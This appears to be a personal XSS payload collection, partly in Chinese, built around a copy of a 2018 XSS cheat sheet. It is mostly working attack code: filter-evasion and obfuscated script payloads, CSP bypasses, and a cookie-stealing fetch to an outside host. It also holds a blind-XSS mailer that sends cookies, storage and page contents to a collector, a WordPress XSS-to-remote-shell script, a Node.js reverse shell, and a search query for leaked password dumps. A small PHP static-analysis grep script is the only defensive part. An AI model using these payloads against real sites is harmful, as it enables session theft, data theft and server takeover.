xss注入
Reflected XSS
Persistent XSS
DOM-based XSS
Mutation XSS
Universal Cross-site Scripting (UXSS)
通用跨站脚本攻击(UXSS)
<marquee>Mannix</marquee>
">"><script>with(document)alert(cookie)</script><"<"
javascript 关键字过滤、+ 加号过滤
# document.cookie
document['coo'['CONCAT'.toLowerCase()]('kie')]
<script>alert(document['coo'['CONCAT'.toLowerCase()]('kie')])</script>
<script>alert(document['dom'['CONCAT'.toLowerCase()]('ain')])</script>
圆括号过滤
# alert(1)
alert`1`
;分号过滤
<img src=1 onerror=alert(1)>
单、双、反引号过滤
eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//
<script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))//</script>
.过滤
with(location)alert(hash)
<script>with(location)alert(hash)</script>
<script>with(document)alert(cookie)</script>
html标签过滤、属性名过滤
<video width="0" height="0" oncanplay=alert`0`>
<source src="http://www.runoob.com/try/demo_source/mov_bbb.mp4" type="video/mp4"></video>
<details ontoggle=alert(1) open>
<marquee onscroll=alert(document.domain)>
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
过滤alert
<script>window['alert'](1)</script>
<script>window['ale'+'rt'](1)</script>
<script>window["alert"](1)</script>
<script>window[`alert`](1)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](1)</script>
<script>top['alert'](1)</script>
<script>frames['alert'](1)</script>
<script>self.frames['alert'](1)</script>
<script>self.parent['alert'](1)</script>
<script>self.top['alert'](1)</script>
top['aler'+'t'](1)
[1].find(confirm)
[1].map(confirm)
[1].some(confirm)
[1].every(confirm)
[1].filter(confirm)
[1].findIndex(confirm)
[1].map(alert)
[1].find(alert)
[1].every(alert)
[1].filter(alert)
[1].findIndex(alert)
[1].some(alert)
<script>[document.cookie].map(alert)</script>
<script>[1].map(alert)</script>
alert(document.domain)
YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==
<svg onload=eval(atob`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`)>
<svg onload=eval(atob`YWxlcnQoMSk=`)>
<svg onload=setTimeout(atob`YWxlcnQoMSk=`)>
<svg onload=setInterval(atob`YWxlcnQoMSk=`)>
<svg onload='new Function(atob`YWxlcnQoMSk=`)()'>
<svg onload=self[`ev`+`al`](atob`YWxlcnQoMSk=`)>
<script>document.write("<s","crip","t>al","ert(","1)","</s","cript>")</script>
<script>atob.constructor(atob`YWxlcnQoMSk`)``</script>
<script>atob.constructor(atob(/YWxlcnQoMSk/.source))()</script>
<script>window[Symbol.hasInstance]=eval
atob`YWxlcnQoMSk` instanceof window</script>
<script>atob.constructor(unescape([...escape((𐑬󠅯󠅣󠅡󠅴󠅩󠅯󠅮󠄽󠄧󠅨󠅴󠅴󠅰󠄺󠄯󠄯󠅩󠅢󠅭󠄮󠅣󠅯󠅭󠄧=ᅠ=>ᅠ).name)].filter((ᅠ,ㅤ)=>ㅤ%12<1|ㅤ%12>9).join([])))()</script>
右下角或者左上角弹窗
<script>Notification.requestPermission(x=>{new(Notification)(document.cookie)})</script>
<script>Notification.requestPermission(x=>{new(Notification)(1)})</script>
XSS Cheat Sheet
2018 Edition
Start to master the fine art of Cross-Site Scripting (XSS) right now!
LAST UPDATED ON 2018-01-29
XSS Cheat Sheet 2018 Edition is a booklet on Cross-Site Scripting (XSS), the most widespread and common flaw found on the World Wide Web. It was designed to be a quick reference for dealing with XSS-related needs of bug hunters, penetration testers, security analysts, web application security students and enthusiasts.
bitcoin:34RPK3S3K8fnja4mKWhC9ms1QCMyjxA6tf?amount=0.001
https://leanpub.com/xss
Basics
HTML Context – Simple Tag Injection
<svg onload=alert(1)>
"><svg onload=alert(1)><"
HTML Context – In Block Tag Injection
<title><style><script><textarea><noscript><pre><xmp><iframe>
</tag><svg onload=alert(1)>
"></tag><svg onload=alert(1)><"
HTML Context – Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
HTML Context – Source Injection
href, src, data
,action,formaction
data:,alert(1)
javascript:alert(1)
data:text/html,<svg onload=alert(1)>
Javascript Context – Code Injection
'-alert(1)-'
'-alert(1)//
连接符号:
+(%2b) - * / % ^ < > <= >= == === != !== ; | %0a %0A %0d %0D %0a%0d %0A%0D //
http://t.mhz.pw/game/xss/scriptstr.php?xss=%27|alert(1)|%27
http://t.mhz.pw/game/xss/scriptstr.php?xss='|alert(1)|'
<script type="text/javascript">
var a = ''|alert(1)|'';
</script>
Javascript Context – Code Injection with Escape Bypass
\'-alert(1)//
Javascript Context – Code Injection in Logical Block
'}alert(1);{'
'}alert(1)%0A{'
\'}alert(1);{//
Javascript Context – Tag Injection
</script><svg onload=alert(1)>
Advanced
Multi Reflection – Double Reflection (Single Input)
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
Multi Reflection – Triple Reflection (Single Input)
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
Multi Input Reflections (Double & Triple)
p=<svg/1='&q='onload=alert(1)>
p=<svg 1='&q='onload='/*&r=*/alert(1)'>
File Upload Injection – Filename
"><svg onload=alert(1)>.gif
File Upload Injection – Metadata
exiftool -Artist='"><svg onload=alert(1)>' xss.jpeg
File Upload Injection – SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
DOM Insert Injection
<img src=1 onerror=alert(1)>
<iframe src=javascript:alert(1)>
DOM Insert Injection – Resource Request
data:text/html,<img src=1 onerror=alert(1)>
data:text/html,<iframe src=javascript:alert(1)>
PHP_SELF Injection
https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>?a=reader
Script Injection – No Closing
<script src=data:,alert(1)>
<script src=//brutelogic.com.br/1.js>
Javascript postMessage() DOM Injection (with Iframe)
<iframe src=TARGET_URL onload="frames[0].postMessage('INJECTION','*')">
XML-based XSS
<x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1)</x:script>
<x:script xmlns:x="http://www.w3.org/1999/xhtml" src="//brutelogic.com.br/1.js"/>
Client Side Template Injection
{{32*32}}
AngularJS Injections (v1.6 and up)
{{constructor.constructor('alert(1)')()}}
<x ng-app>{{constructor.constructor('alert(1)')()}}
CRLF Injection
%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0A%0D%0A
%3Cscript%3Ealert(1)%3C/script%3E
%0D%0ALocation:%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection
%3a0%0D%0A%0D%0A%3Cscript%3Ealert(1)%3C/script%3E
Filter Bypass
Mixed Case XSS
<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>
Unclosed Tags
<svg onload=alert(1)//
<svg onload="alert(1)"
Uppercase XSS
<SVG ONLOAD=alert(1)>
<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
Extra Content for Script Tags
<script/x>alert(1)</script>
Double Encoded XSS
%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E
Alert without Parentheses (Strings Only)
alert`1`
Alert without Parentheses
setInterval`alert\x28document.domain\x29`
setTimeout`alert\x28document.domain\x29`
Alert without Parentheses (Tag Exclusive)
<svg onload=alert(1)>
<svg onload=alert(1)>
Alert without Alphabetic Chars
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
Alert Obfuscation
top window parent self this frames
(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
File Upload Injection – HTML/js GIF Disguise
GIF89a=//<script>
alert(1)//</script>;
Jump to URL Fragment
eval(URL.slice(-8)) #alert(1)
eval(location.hash.slice(1)) #alert(1)
document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>
* (Webkit only)
<svg/onload=innerHTML=location.hash> #<img/src/onerror=alert(1)>
HTML Alternative Separators
Tag Scheme:
<name [1] attrib [2] = [3] value [4] handler [5] = [6] js [7]>
[1], [2], [5] => %09, %0A, %0C, %0D, %20, / and +
[3] & [4] => %09, %0A, %0C, %0D, %20, + and ' or " in both
[6] & [7] => %09, %0A, %0B, %0C, %0D, %20, /, + and ' or " in both
Strip Tags Based Bypass
"o<x>nmouseover=alert<x>(1)//
"autof<x>ocus o<x>nfocus=alert<x>(1)//
2nd Order XSS Injection
<svg/onload=alert(1)>
Event Origin Bypass for postMessage() XSS
http://facebook.com.localhost/crosspwn.php?
target=//brutelogic.com.br/tests/status.html&msg=<script>alert(1)</script>
CSP Bypass (for Whitelisted Google Domains)
<script src=https://www.google.com/complete/search?client=chrome
%26jsonp=alert(1);></script>
<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js>
</script><x ng-app ng-csp>{{constructor.constructor('alert(1)')()}}
Vectors without Event Handlers
<script>alert(1)</script>
<script src=data:,alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
Vectors with Agnostic Event Handlers
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
Javascript Alternative Comments
<!--
%0A-->
Exploitation
Remote Script Call
1. HTML-based (response must be HTML and carry an Access-Control-Allow-Origin (CORS) header)
"var x=new XMLHttpRequest();x.open('GET','//brutelogic.com.br/0.php');x.send();
x.onreadystatechange=function(){if(this.readyState==4){write(x.responseText)}}"
fetch('//brutelogic.com.br/0.php').then(function(r){r.text().then(function(w)
{write(w)})})
* (with fully loaded jQuery library)
$.get('//brutelogic.com.br/0.php',function(r){write(r)})
2. Javascript-based (response must be javascript)
* (with fully loaded jQuery library)
$.getScript('//brutelogic.com.br/2.js')
WordPress XSS to RCE (up to v4.9.1)
p = '/wordpress/wp-admin/plugin-editor.php?';
q = 'file=hello.php';
s = '<?=`nc localhost 5855 -e /bin/bash`;';
a = new XMLHttpRequest();
a.open('GET', p+q, 0);
a.send();
$ = '_wpnonce=' + /nonce" value="([^"]*?)"/.exec(a.responseText)[1] +
'&newcontent=' + s + '&action=update&' + q;
b = new XMLHttpRequest();
b.open('POST', p+q, 1);
b.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
b.send($);
b.onreadystatechange = function(){
if (this.readyState == 4) {
fetch('/wordpress/wp-content/plugins/hello.php');
}
}
Blind XSS Mailer
<?php header("Content-type: application/javascript"); ?>
var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] .
$_SERVER["REQUEST_URI"] ?>';
var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' +
document.URL;
msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE
COOKIES\n' + document.cookie;
msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) +
'\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;
var r = new XMLHttpRequest();
r.open('POST', mailer, true);
r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
r.send('origin=' + document.location.origin + '&msg=' +
encodeURIComponent(msg));
<?php
header("Access-Control-Allow-Origin: " . $_POST["origin"]);
$origin = $_POST["origin"];
$to = "myName@myDomain";
$subject = "XSS Blind Report for " . $origin;
$ip = "Requester: " . $_SERVER["REMOTE_ADDR"] . "\nForwarded For: ".
$_SERVER["HTTP_X_FORWARDED_FOR"];
$msg = $subject . "\n\nIP ADDRESS\n" . $ip . "\n\n" . $_POST["msg"];
$headers = "From: report@myDomain" . "\r\n";
if ($origin && $msg) {
mail($to, $subject, $msg, $headers);
}
?>
Invisible Foreign XSS Embedding
<iframe src="//brutelogic.com.br/xss.php?a=<svg onload=alert(document.domain)>"
style=display:none></iframe>
Cookie Stealing
fetch('//brutelogic.com.br/?c='+document.cookie)
Simple Virtual Defacement
<svg onload="documentElement.innerHTML='<h1>Not Found</h1>'">
Browser Remote Control
Javascript:
setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:5855'},100)
Listener:
brute@logic:~$ while :; do printf "j$ "; read c; echo $c | nc -lp 5855 >/dev/null; done
Miscellaneous
XSS Online Test Page
https://brutelogic.com.br/xss.php
Multi-Case Filter-Aware HTML Injection
'"</Script><Html /Onmouseover=(alert)(1) //
Javascript Execution Delay
onload=function(){$.getScript('//brutelogic.com.br/2.js')}
onload=x=>$.getScript('//brutelogic.com.br/2.js')
Valid Source for Image Tags
<img
src=
onload=alert(1)>
Shortest XSS
<base href=//knoxss.me>
Mobile-only Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<body onorientationchange=alert(1)>
Body Tag
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=%23x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1!
Less Known XSS Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Cross-Origin Script (Crosspwn)
http://facebook.com.localhost/crosspwn.php?
target=//brutelogic.com.br/tests/status.html&msg=<script>alert(document.domain)
Where “facebook.com” is an allowed origin and “localhost” is the attacking domain, “//brutelogic.com.br/tests/status.html” is the target page, and “<script>alert(document.domain)” is the message sent.
http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?
a=<body/onresize=alert(document.domain)>
http://localhost/crosspwn.php?target=//brutelogic.com.br/xss.php?
a=<svg/onload=eval(name)>&name=alert(document.domain)
<!DOCTYPE html>
<body onload="crossPwn()">
<h2>CrossPwn</h2>
<iframe src="<?php echo htmlentities($_GET['target'], ENT_QUOTES) ?>"
name="<?php echo $_GET['name'] ?>" height="0"
style="visibility:hidden"></iframe>
<script>
function crossPwn() {
frames[0].postMessage('<?php echo $_GET["msg"] ?>','*'); // onmessage
document.getElementsByTagName('iframe')[0].setAttribute('height', '1'); //
onresize
document.getElementsByTagName('iframe')[0].src = '<?php echo
$_GET["target"] ?>' + '#brute'; // onhashchange
}
</script>
</body>
</html>
Simple XSS Finder Script for PHP (Static Analysis)
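#!/usr/bin/env bash
# Simple static-analysis helper for PHP: greps one file (or every *.php file
# under a folder) for output sinks that appear on the same line as a request
# source, or on the same line as a variable that was assigned from one.
# Output is grep's coloured, line-numbered matches.
#
# Usage: $0 FILE        scan one file
#        $0 -r FOLDER   scan every *.php file under FOLDER
#
# Heuristic only: same-line matching misses multi-line data flows and also
# reports sanitised uses, so treat hits as review candidates, not findings.

if [ -z "$1" ] || { [ "$1" = "-r" ] && [ -z "$2" ]; }; then
  printf 'Usage:\n%s FILE\n%s -r FOLDER\n' "$0" "$0"
  exit 1
fi
f=$1

# Request sources, as grep BRE fragments; each is matched as "$_<source>".
sources=(GET POST REQUEST "SERVER\['PHP" "SERVER\['PATH_" "SERVER\['REQUEST_U")
# Output sinks. "?" is quoted so the shell does not glob it against the cwd;
# at the start of a BRE it is a literal and matches the "<?=" short echo tag.
sinks=("?" echo die print printf print_r var_dump)

# Scan the file named by $f: first report sink lines that reference a source
# directly, then sink lines that reference a variable assigned from a source.
xssam() {
  local src sink var assigned
  for src in "${sources[@]}"; do
    # Variable names taken from assignment lines that read this source.
    assigned=$(grep -in "\$_${src}" "$f" | grep -o "\$.*=" | sed "s/[ ]\?=//g" | sort -u)
    for sink in "${sinks[@]}"; do
      grep --color -in "${sink}.*\$_${src}" "$f"
      # Unquoted on purpose: one variable name per whitespace-separated token.
      for var in $assigned; do
        grep --color -in "${sink}.*${var}" "$f"
      done
    done
  done
}

if [ "$f" != "-r" ]; then
  xssam
else
  # -print0 / read -d '' keeps file names with spaces or newlines intact.
  find "$2" -type f -name "*.php" -print0 | while IFS= read -r -d '' file; do
    echo "File: $file"
    f=$file
    xssam
  done
fi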
Node.js RCE
Javascript:
require('child_process').exec('bash -c "bash -i >& /dev/tcp/HOST/5855 0>&1"')
nc -lp 5855
ASCII Encoding Table
Remember to replace “&” and “#” in URLs with their encoded versions (%26 and %23 respectively).
<iframe srcdoc="<script>alert(document.domain)</script>">
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
'"()%26%25<acx><ScRiPt >prompt(931289)</ScRiPt>
http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E
'"()%26%25<acx><ScRiPt >prompt(973761)</ScRiPt>
<script x>
<script x>alert('XSS')<script y>
<test haha=x >
<test onxxx=xxxx>
<svg onxxx=xxx>, <marquee onxxx=xxx>, <audio onxxx=xxx>
<x oncopy=alert('XSS')>copy this
<haha onclick=alert('XSS')>click here
<svg onload=alert('XSS')>
<marquee onstart=alert('XSS')>
alert() prompt() confirm()
alert`` prompt`` confirm``
(alert)`` (prompt)`` (confirm)``
[8].some(alert) (((prompt)))`` co\u006efirm
<audio src=//14.rs>
https://xsshunter.com/features
https://github.com/ssl/ezXSS
https://github.com/LewisArdern/bXSS
https://knoxss.me/?page_id=2
eval(new class extends String{}('alert')+new class extends String{}('(1)'))
<script type="text/javascript">
eval(new class extends String{}('alert')+new class extends String{}('(1)'))
</script>
filetype:sql intext:password | pass | passwd intext:username intext:INSERT INTO `users` VALUES
更新一句([,_____,,,,___]=(__=[])+{_:__},[______,_,________,____,,_________,_______,__,,,__________]=[!!_____]+!_____+_____._____)[___+=_____+__________+__+______+_+________+___+______+_____+_][___](_________+_______+____+_+______+'(-~_)')()
<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]
+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])</script>
<script>
document.getElementsByName("masked")[0].value="<h1 onmousemove=alert(1)>"+"B".repeat(20000)
document.forms[0].submit();
</script>